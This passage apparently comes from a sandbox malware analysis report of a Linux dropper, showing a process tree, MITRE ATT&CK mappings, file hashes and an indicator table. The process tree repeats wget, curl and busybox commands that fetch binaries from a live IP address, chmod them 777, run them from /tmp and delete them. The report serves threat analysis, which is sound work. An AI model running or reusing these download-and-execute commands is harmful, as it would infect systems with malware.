  ./2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil
  2⤵
  - Executes dropped EXE
  PID:950
- /bin/rm
  rm 2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil
  2⤵
  PID:951
- /usr/bin/wget
  wget http://216.126.231.240/bins/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff
  2⤵
  PID:952
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:953
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff
  2⤵
  PID:954
- /bin/chmod
  chmod 777 PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff
  2⤵
  - File and Directory Permissions Modification
  PID:955
- /tmp/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff
  ./PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff
  2⤵
  - Executes dropped EXE
  PID:956
- /bin/rm
  rm PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff
  2⤵
  PID:957
- /usr/bin/wget
  wget http://216.126.231.240/bins/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4
  2⤵
  PID:958
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:959
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4
  2⤵
  PID:960
- /bin/chmod
  chmod 777 OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4
  2⤵
  - File and Directory Permissions Modification
  PID:961
- /tmp/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4
  ./OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4
  2⤵
  - Executes dropped EXE
  PID:962
- /bin/rm
  rm OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4
  2⤵
  PID:963
- /usr/bin/wget
  wget http://216.126.231.240/bins/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC
  2⤵
  PID:964
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:965
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC
  2⤵
  PID:966
- /bin/chmod
  chmod 777 LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC
  2⤵
  - File and Directory Permissions Modification
  PID:967
- /tmp/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC
  ./LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC
  2⤵
  - Executes dropped EXE
  PID:968
- /bin/rm
  rm LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC
  2⤵
  PID:969
- /usr/bin/wget
  wget http://216.126.231.240/bins/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC
  2⤵
  PID:970
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:971
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC
  2⤵
  PID:972
- /bin/chmod
  chmod 777 pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC
  2⤵
  - File and Directory Permissions Modification
  PID:973
- /tmp/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC
  ./pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC
  2⤵
  - Executes dropped EXE
  PID:974
- /bin/rm
  rm pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC
  2⤵
  PID:975
- /usr/bin/wget
  wget http://216.126.231.240/bins/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3
  2⤵
  PID:976
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:977
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3
  2⤵
  PID:978
- /bin/chmod
  chmod 777 6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3
  2⤵
  - File and Directory Permissions Modification
  PID:979
- /tmp/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3
  ./6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3
  2⤵
  - Executes dropped EXE
  PID:980
- /bin/rm
  rm 6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3
  2⤵
  PID:981
- /usr/bin/wget
  wget http://216.126.231.240/bins/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW
  2⤵
  PID:982
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:983
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW
  2⤵
  PID:984
- /bin/chmod
  chmod 777 UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW
  2⤵
  - File and Directory Permissions Modification
  PID:985
- /tmp/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW
  ./UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW
  2⤵
  - Executes dropped EXE
  PID:986
- /bin/rm
  rm UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW
  2⤵
  PID:987
- /usr/bin/wget
  wget http://216.126.231.240/bins/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ
  2⤵
  - System Network Configuration Discovery
  PID:988
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:989
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ
  2⤵
  - System Network Configuration Discovery
  PID:990
- /bin/chmod
  chmod 777 k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ
  2⤵
  - File and Directory Permissions Modification
  PID:991
- /tmp/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ
  ./k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ
  2⤵
  - Executes dropped EXE
  - System Network Configuration Discovery
  PID:992
- /bin/rm
  rm k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ
  2⤵
  - System Network Configuration Discovery
  PID:993

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4

Filesize
153B

MD5
998368d7c95ea4293237f2320546e440

SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4

SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736

SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Download Submit

ioc	pid	process
/tmp/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4	752	OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4
/tmp/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC	790	LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC
/tmp/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC	809	pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC
/tmp/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3	818	6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3
/tmp/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW	847	UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW
/tmp/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ	857	k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ
/tmp/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5	866	Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5
/tmp/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1	872	0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1
/tmp/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci	878	Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci
/tmp/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463	884	V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463
/tmp/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX	890	zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX
/tmp/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ	896	BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ
/tmp/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil	902	2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil
/tmp/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff	908	PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff
/tmp/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5	914	Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5
/tmp/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1	920	0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1
/tmp/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci	926	Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci
/tmp/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463	932	V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463
/tmp/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX	938	zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX
/tmp/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ	944	BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ
/tmp/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil	950	2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil
/tmp/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff	956	PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff
/tmp/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4	962	OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4
/tmp/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC	968	LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC
/tmp/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC	974	pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC
/tmp/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3	980	6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3
/tmp/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW	986	UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW
/tmp/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ	992	k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ